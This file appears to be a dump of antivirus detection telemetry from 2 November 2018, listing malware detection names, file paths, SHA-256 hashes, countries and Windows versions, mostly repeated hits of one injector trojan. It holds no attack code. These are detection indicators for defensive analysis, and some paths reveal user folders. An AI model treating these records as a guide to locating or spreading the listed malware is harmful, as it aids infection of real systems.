  Row(detection=Row(filename='avscan-20181102-050741-31ea810c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050741-31EA810C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053914-9a5505d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053914-9A5505D5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052817-129b42ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052817-129B42EF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055254-831b4c0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055254-831B4C0C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052001-eae91f86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052001-EAE91F86', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6e25682360f1f77cb50019762a80676835dc64b95c7e676665243a773bdedc56', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6E25682360F1F77CB50019762A80676835DC64B95C7E676665243A773BDEDC56', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6e25682360f1f77cb50019762a80676835dc64b95c7e676665243a773bdedc56', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:58:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060103-a6666abe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060103-A6666ABE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000007b6', filepath='C:\\Windows\\Temp\\tmp00000111\\tmp000007b6', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T21:46:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-130214-2e538e81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-130214-2E538E81', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:05:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055253-824ec30f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055253-824EC30F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:52:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061445-90c85788', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061445-90C85788', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6160b52b9f33ead00b723b6167c72faf0c8a53483b1aa6f5a075c62f6e892efe', filepath='C:\\Users\\X\\Downloads\\t\\ D_\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-24\\6160B52B9F33EAD00B723B6167C72FAF0C8A53483B1AA6F5A075C62F6E892EFE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6160b52b9f33ead00b723b6167c72faf0c8a53483b1aa6f5a075c62f6e892efe', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:38:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133936-ceee4cb3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-133936-CEEE4CB3', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:42:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051522-450885e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051522-450885E5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uuofvcce.exe', filepath='f:\\recycler\\s-7-5-57-0134166447-0306465866-823005636-0523\\uuOFvCcE.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:26:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sounds.exe', filepath='I:\\ألعاب\\Games 1\\بولنج\\MIXOLGY.NET_Bowling.Hawaiian.Vacationd. _By  MIDOPOP\\sfx\\sounds\\sounds.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='607dc9068a416a57dbd52e6cd60ab12dc6e481e5dd7eb93465cf3752df6b259d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files (x86)\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T01:40:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051615-64a043b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051615-64A043B7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052640-d9357a68', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052640-D9357A68', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060656-78c0f86f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060656-78C0F86F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061125-19011a60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061125-19011A60', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062610-28f35c85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062610-28F35C85', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054921-03fbc3ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054921-03FBC3AB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051056-a6897641', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051056-A6897641', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055551-ecc1c633', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055551-ECC1C633', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053448-fbcbc21c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053448-FBCBC21C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052622-ce674d20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052622-CE674D20', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060021-8d78b923', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060021-8D78B923', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061741-f95a5b31', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061741-F95A5B31', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053643-4086341b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053643-4086341B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:36:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052748-01aca104', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052748-01ACA104', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052420-85491f12', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052420-85491F12', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060416-195ac7bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060416-195AC7BF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060511-3a7ff3a1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060511-3A7FF3A1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062024-5a8d0b6a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062024-5A8D0B6A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061834-19286e7a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061834-19286E7A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:18:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055557-effe20cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055557-EFFE20CC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055358-a90f4e7c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055358-A90F4E7C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:53:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051328-00f03a02', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051328-00F03A02', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052732-f7c09665', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052732-F7C09665', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052933-4012452e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052933-4012452E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055922-6a3d2d32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055922-6A3D2D32', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051141-c13362d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051141-C13362D1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053727-5aa6e3e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053727-5AA6E3E9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051121-b4ece94d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051121-B4ECE94D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055837-4f8ffb94', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055837-4F8FFB94', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052050-0885b486', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052050-0885B486', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054122-e6659356', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054122-E6659356', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060654-77de7825', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060654-77DE7825', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061506-9ccd6f4a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061506-9CCD6F4A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051435-28a38c8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051435-28A38C8D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054818-de8844d7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054818-DE8844D7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055944-779c76bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055944-779C76BB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:43Z'), dt=datetime.date(2018, 11, 2)),
